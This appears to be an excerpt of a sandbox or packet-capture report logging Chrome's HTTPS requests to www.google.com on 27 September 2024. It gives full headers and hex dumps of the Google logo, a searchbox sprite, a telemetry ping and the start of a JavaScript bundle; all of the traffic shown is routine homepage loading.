                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; NID=517=0pWICYgHMs0q-7BzPo6KFxjDxz-SJgCVgj7jFPfXVbH6EjrjxWQ3Rl4lRdRUpk2LNOL2fdjvF93g43vXkJfqEPVF-u3r96lMxeDIRyymdIz_6oVDBsgJDwWab4ew6-xR-owJ_8OPa0nCoUm8CYc_2r0T-OcCst6msaOsdOwe2x5KU1dMUWSBSxX6OPpRIVWNLRI
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:16 UTC715INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-aH2jvKABwBToFF5oYaJ3zg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]}
                                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:16 GMT
                                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          30192.168.2.749769142.250.186.1324435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:16 UTC760OUTGET /images/branding/googlelogo/1x/googlelogo_color_272x92dp.png HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; NID=517=0pWICYgHMs0q-7BzPo6KFxjDxz-SJgCVgj7jFPfXVbH6EjrjxWQ3Rl4lRdRUpk2LNOL2fdjvF93g43vXkJfqEPVF-u3r96lMxeDIRyymdIz_6oVDBsgJDwWab4ew6-xR-owJ_8OPa0nCoUm8CYc_2r0T-OcCst6msaOsdOwe2x5KU1dMUWSBSxX6OPpRIVWNLRI
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:17 UTC671INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 5969
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:17 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:41:17 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: private, max-age=31536000
                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:17 UTC719INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 10 00 00 00 5c 08 06 00 00 00 a6 e7 ea b6 00 00 17 18 49 44 41 54 78 01 ed 5d 0b 94 1c 55 99 be 3a d3 81 c0 2e 82 c2 2a 82 08 12 10 90 05 92 aa 9a 84 90 d8 5d b7 7b b2 41 e2 41 81 28 b8 bb 0a 08 8a 1b 5c 84 98 05 e5 31 9a ae 9a 09 89 c0 02 0a 41 40 36 e1 81 06 17 10 1f 90 cc 24 01 f4 08 28 c8 43 58 58 7c 10 1e 64 fa 11 92 49 55 75 1e 99 64 7a ef b7 e6 b8 a4 b7 67 e6 bf d5 75 bb aa 87 fb 9d 73 4f e7 31 d3 d3 67 ea d6 57 ff fd ff ef ff 7e 16 07 66 76 ad db 2b ed 54 4c ee 7a a7 71 d7 9f 63 bb c1 65 b6 eb 3b dc f1 7b c4 df e7 8b bf 5f 22 d6 b9 d9 ee 60 56 da f5 8f 4e 77 55 77 67 1a 1a 1a ef 4c a4 7b 36 1f cc 9d ca 79 dc 0d ee b2 5d ff cf e2 b5 2a b3 32 79 6f bb 78 7d 5e 7c ef cd dc f5 ff 29 dd e5 ed cb
                                                                                                                                                                                                                                                                                          Data Ascii: PNGIHDR\IDATx]U:.*]{AA(\1A@6$(CXX|dIUudzgusO1gW~fv+TLzqce;{_"`VNwUwgL{6y]*2yox}^|)
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:17 UTC1390INData Raw: 43 84 69 68 68 02 89 07 5d 5d d5 77 73 d7 7f 4c 92 3c e6 31 0d 0d 0d 4d 20 82 0c 3e 2f 79 6c b9 86 1e 79 68 68 8c 59 68 02 99 79 ed d0 6e dc f5 d6 48 94 69 57 21 d9 ca 34 34 34 34 81 70 27 38 47 82 3c d6 a1 8c ca 34 34 34 34 81 20 f7 21 d3 24 27 92 95 5f 60 80 86 86 86 26 10 f4 ba c8 68 3d 40 38 0c d0 d0 d0 d0 04 c2 f3 c1 9d 54 02 41 6f 0c 03 34 34 34 34 81 a0 23 96 da 69 9b 71 fd 27 74 d5 a5 75 a0 a1 09 a4 da c5 de 8d c5 54 01 e2 2b 6a f4 41 53 79 6a 54 d3 e9 f6 75 dc e8 28 66 cd 79 c5 ac 75 77 81 1b bf 2d 65 8d 42 c9 b6 2a 85 ac 35 84 57 fc 1d ff 2e fe ff ae a2 6d 7e bd 9c 35 2d 7c 5f 22 3e ff 6a d6 be ad af bd 63 5b 6f fb bc 6d 2b da ef 1e ec 4b fd 76 eb 8a 54 61 6b 5f aa 22 fe 5c 15 7f 1e 14 ab 3c d8 db f6 8c f8 ba 1f 89 75 b1 f8 da e3 f1 7d 2c 01 c0
                                                                                                                                                                                                                                                                                          Data Ascii: Cihh]]wsL<1M >/ylyhhYhynHiW!4444p'8G<4444 !$'_`&h=@8TAo4444#iq'tuT+jASyjTu(fyuw-eB*5W.m~5-|_">jc[om+KvTak_"\<u},
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:17 UTC1390INData Raw: 43 0f b1 f7 8a 23 ce 72 99 ca cc 96 87 c6 1d 31 aa d5 c4 4e b1 23 71 fd 11 92 83 b0 09 5a 54 77 92 40 20 90 a4 4b 44 a3 cf 23 ca 0d 59 51 5c 48 8c 42 9e c5 91 aa 36 2c bc 92 96 44 f5 1e 1c f3 11 88 13 5c 3c cc 85 5c 2a 71 21 ef ad 1a 46 8a 35 80 ea ec a3 c6 15 b3 d6 4f 24 7e e6 6d 6c 04 88 68 62 89 c4 b1 e2 9e 46 fb 59 aa 4f b2 94 78 9f fb 24 a2 9d 11 f3 6b 19 c7 3b 55 86 3c a6 3b c1 fe ac 01 80 7c 32 6e f0 56 d3 09 a4 f6 98 91 b5 7c 62 14 fa 5f 88 56 1a e9 db c2 51 9b f2 b3 10 55 d7 3a b0 cf 25 26 51 5f 1e eb 04 62 77 07 5f 67 35 28 e7 26 7e 90 aa f7 28 64 cd 27 11 16 32 02 68 6a 43 e3 19 a2 c8 6c 10 99 fa ba 11 c1 83 6c 7f b2 de 63 45 ea 09 91 93 d8 8d 45 80 a1 5f b3 f1 22 2f f2 3b 6a 14 32 b4 62 fc b0 ee 76 f0 9f 21 b6 5a 78 c8 75 b0 08 20 f6 c2 8c 38
                                                                                                                                                                                                                                                                                          Data Ascii: C#r1N#qZTw@ KD#YQ\HB6,D\<\*q!F5O$~mlhbFYOx$k;U<;|2nV|b_VQU:%&Q_bw_g5(&~(d'2hjCllcEE_"/;j2bv!Zxu 8
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:17 UTC1390INData Raw: 0d 7f e3 9a a7 13 2f d6 0f 98 42 60 68 10 d1 bf f2 33 ec 6d d8 de 97 3a 9d 56 3e 6d bb 45 71 19 f7 0e ca e7 c0 e7 dd c5 81 2c bf f9 10 e2 3e 7c 89 29 42 6e be 77 64 93 85 64 d8 77 3d 0d 3a f8 3f 02 43 21 9a cc 5d 01 30 40 4a 72 86 c6 d2 d9 cb aa 6d 2c 01 80 7a 51 90 da 6f c9 47 31 a7 72 f2 b0 12 e0 f4 e4 83 89 5d b8 eb c3 74 e1 52 65 c8 d4 b6 ee da 27 cd e6 d5 bb 1d 4c ac 7e bc 25 5a f8 95 7c 7e e4 57 44 72 d4 a3 7c 8e cd cb 77 3b a4 f6 e9 4f 95 17 a0 08 c0 14 00 1a 93 a6 2b 51 73 e6 29 21 88 c3 2f 71 eb 7b 30 5f 8e ff 26 5c 18 7c 40 90 c8 7a c9 6e d6 65 18 f2 c3 62 c4 cc ae 75 7b 71 37 78 44 22 7a 7a 7a b4 06 2c 6a b7 62 39 6b 7e 49 51 33 dd bf 12 37 d0 1f ea 3b b0 b7 bd 42 24 91 73 14 4d bc fb 2a e5 e7 e3 73 d6 73 3f e3 f9 e0 4e 62 1e eb 56 05 f3 75 db
                                                                                                                                                                                                                                                                                          Data Ascii: /B`h3m:V>mEq,>|)Bnwddw=:?C!]0@Jrm,zQoG1r]tRe'L~%Z|~WDr|w;O+Qs)!/q{0_&\|@znebu{q7xD"zzz,jb9k~IQ37;B$sM*ss?NbVu
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:17 UTC1080INData Raw: 35 71 cf fd be 90 35 3f c2 54 03 c2 2c 54 56 70 03 c7 73 5c 81 fd bf b7 04 19 75 d6 44 94 b2 1d 27 29 0e 2d 51 3e 5b 8b 11 13 4c 01 44 27 ee 49 22 09 da af 92 38 f0 fe 98 f4 af 46 4c 58 b1 60 2b a1 60 3f 55 60 54 04 55 75 92 08 04 78 79 e6 84 dd f0 30 41 45 44 2d 79 98 37 10 12 a6 d1 13 09 ca a5 b6 eb bd d6 ac 88 03 ea 43 94 7e 59 93 51 33 08 79 11 ca aa 51 db ce 95 b2 e6 95 aa 1b a5 44 3e 62 2f 11 1d 2c c2 78 cb 48 89 03 ef 87 a8 03 93 fe 15 02 33 61 6c d7 ff 56 54 0f af bf 54 1a fd 63 98 00 85 40 90 a8 57 42 20 84 36 8b 02 b7 1e 8e 9a 38 10 e1 14 73 c6 34 16 27 a0 04 84 f0 cb 76 fc 5b b8 1b 94 23 26 8d 6d f0 21 e1 4e 70 4e 6e c1 7a 85 9b 53 be 09 a9 c4 ad 6e 44 24 8d 46 1c c5 ac e9 d4 cc e2 50 0e e8 3d c4 8d df dd 68 44 b2 b3 81 ae 07 fa 90 66 77 91 43
                                                                                                                                                                                                                                                                                          Data Ascii: 5q5?T,TVps\uD')-Q>[LD'I"8FLX`+`?U`TUuxy0AED-y7C~YQ3yQD>b/,xH3alVTTc@WB 68s4'v[#&m!NpNnzSnD$FP=hDfwC


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          31192.168.2.749770142.250.186.1324435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:17 UTC754OUTGET /images/searchbox/desktop_searchbox_sprites318_hr.webp HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; NID=517=0pWICYgHMs0q-7BzPo6KFxjDxz-SJgCVgj7jFPfXVbH6EjrjxWQ3Rl4lRdRUpk2LNOL2fdjvF93g43vXkJfqEPVF-u3r96lMxeDIRyymdIz_6oVDBsgJDwWab4ew6-xR-owJ_8OPa0nCoUm8CYc_2r0T-OcCst6msaOsdOwe2x5KU1dMUWSBSxX6OPpRIVWNLRI
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC671INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Content-Type: image/webp
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 660
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:18 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:41:18 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: private, max-age=31536000
                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 22 Apr 2020 22:00:00 GMT
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC660INData Raw: 52 49 46 46 8c 02 00 00 57 45 42 50 56 50 38 4c 80 02 00 00 2f 27 c0 1e 10 d5 48 76 b6 3d 6e 95 fb bf 0a bb 07 b8 51 ea d8 9f 99 61 e5 e8 28 52 76 0c 6f ab da 55 98 1c c6 fe ea 8a 99 6c 18 b6 6d 1b a6 ff 1f dc da f4 06 30 6c db 36 6c ae ed 66 da 0c b1 ed 09 a4 90 41 3f 42 08 43 98 41 19 94 c1 32 68 06 9d 41 67 30 84 10 0e e1 47 38 07 6e 23 29 52 ba 6a f1 78 a0 e6 be 50 9e 46 e5 ce 49 3b cc 4f 78 a1 e7 c7 cf f5 1c 37 2d f7 c8 cf 62 58 9e 2f eb c0 5d c5 88 96 af 33 cb b8 1c 54 80 ab 93 e1 a2 35 b7 ba 01 78 ee ac da f6 47 2e 43 09 aa 19 e0 b7 25 e2 75 03 8e 19 f9 14 75 2f 97 5f b4 3d f0 b2 94 98 bc 10 3c 21 71 06 5c 86 f8 07 39 02 f7 de b2 c2 15 5c f7 a6 1a 07 70 3a 14 bc 50 f8 34 1f 61 53 00 4e 29 9c 3e b0 3e 18 ae 22 06 db 83 39 99 e0 56 68 20 a7 aa d0 80
                                                                                                                                                                                                                                                                                          Data Ascii: RIFFWEBPVP8L/'Hv=nQa(RvoUlm0l6lfA?BCA2hAg0G8n#)RjxPFI;Ox7-bX/]3T5xG.C%uu/_=<!q\9\p:P4aSN)>>"9Vh


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          32192.168.2.749771142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:17 UTC1538OUTPOST /gen_204?s=webhp&t=aft&atyp=csi&ei=CsT2Zo-iIaySxc8Pn72EmA8&rt=wsrt.1050,aft.1504,afti.1504,cbs.108,cbt.961,hst.49,prt.1078&imn=11&ima=2&imad=0&imac=0&wh=907&aftie=NF&aft=1&aftp=907&opi=89978449&ts=199973 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Origin: https://www.google.com
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; NID=517=0pWICYgHMs0q-7BzPo6KFxjDxz-SJgCVgj7jFPfXVbH6EjrjxWQ3Rl4lRdRUpk2LNOL2fdjvF93g43vXkJfqEPVF-u3r96lMxeDIRyymdIz_6oVDBsgJDwWab4ew6-xR-owJ_8OPa0nCoUm8CYc_2r0T-OcCst6msaOsdOwe2x5KU1dMUWSBSxX6OPpRIVWNLRI
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:17 UTC715INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-o32D1VgXhDBGJBOBMUcOPg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]}
                                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:17 GMT
                                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          33192.168.2.749776142.250.186.1324435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC3341OUTGET /xjs/_/js/k=xjs.hd.en.dIEp8Iy3TZo.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAIAgQAEAAACAAgAAAAAAAAAAAAAAAAAAAgQBAEQCAAACAOAAACAQAAABAAISAAABEoBHmQAAEQBMAAAAAAAQAAAIFAEAQAAAAAYAAAABAAAAAAAKAAAAAAAAAAAAAAAAAEAAgQAAAAAAAAAAAAAgAAAAAPQAAAAAAAAAgAAAAAECAANkAAIAAAAAAAD6ACB4AAwpLAAAAAAAAAAAAAAAEIAEwVxIQEEAAgAAAAAAAAAAAAAAACAlTVzY/d=1/ed=1/dg=3/br=1/rs=ACT90oHQtgb1Vp7_2FMfyCLADlsBNbpGNA/ee=ALeJib:B8gLwd;AfeaP:TkrAjf;BMxAGc:E5bFse;BgS6mb:fidj5d;BjwMce:cXX2Wb;CxXAWb:YyRLvc;DULqB:RKfG5c;Dkk6ge:JZmW9e;DpcR3d:zL72xf;EABSZ:MXZt9d;ESrPQc:mNTJvc;EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;EnlcNd:WeHg4;F9mqte:UoRcbe;Fmv9Nc:O1Tzwc;G0KhTb:LIaoZ;G6wU6e:hezEbd;GleZL:J1A7Od;HMDDWe:G8QUdb;HoYVKb:PkDN7e;HqeXPd:cmbnH;IBADCc:RYquRb;IoGlCf:b5lhvb;IsdWVc:qzxzOb;JXS8fb:Qj0suc;JbMT3:M25sS;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;KOxcK:OZqGte;KQzWid:ZMKkN;KcokUb:KiuZBf;KpRAue:Tia57b;LBgRLc:SdcwHb,XVMNvd;LEikZe:byfTOb,lsjVmc;LXA8b:q7OdKd;LsNahb:ucGLNb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Np8Qkd:Dpx6qc;Nyt6ic:jn2sGd;OgagBe:cNTe0;OohIYe:mpEAQb;Pjplu [TRUNCATED]
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; NID=517=0pWICYgHMs0q-7BzPo6KFxjDxz-SJgCVgj7jFPfXVbH6EjrjxWQ3Rl4lRdRUpk2LNOL2fdjvF93g43vXkJfqEPVF-u3r96lMxeDIRyymdIz_6oVDBsgJDwWab4ew6-xR-owJ_8OPa0nCoUm8CYc_2r0T-OcCst6msaOsdOwe2x5KU1dMUWSBSxX6OPpRIVWNLRI
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC831INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="gws-team"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 1037371
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 06:03:15 GMT
                                                                                                                                                                                                                                                                                          Expires: Sat, 27 Sep 2025 06:03:15 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, immutable, max-age=31536000
                                                                                                                                                                                                                                                                                          Last-Modified: Fri, 27 Sep 2024 04:59:45 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                                          Age: 31083
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:18 UTC559INData Raw: 74 68 69 73 2e 5f 68 64 3d 74 68 69 73 2e 5f 68 64 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 47 6f 6f 67 6c 65 20 4c 4c 43 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 34 20 47 6f 6f 67 6c 65 2c 20 49 6e 63 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64
                                                                                                                                                                                                                                                                                          Data Ascii: this._hd=this._hd||{};(function(_){var window=this;try{/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0*//* Copyright Google LLC SPDX-License-Identifier: Apache-2.0*//* Copyright 2024 Google, Inc SPDX-License-Id
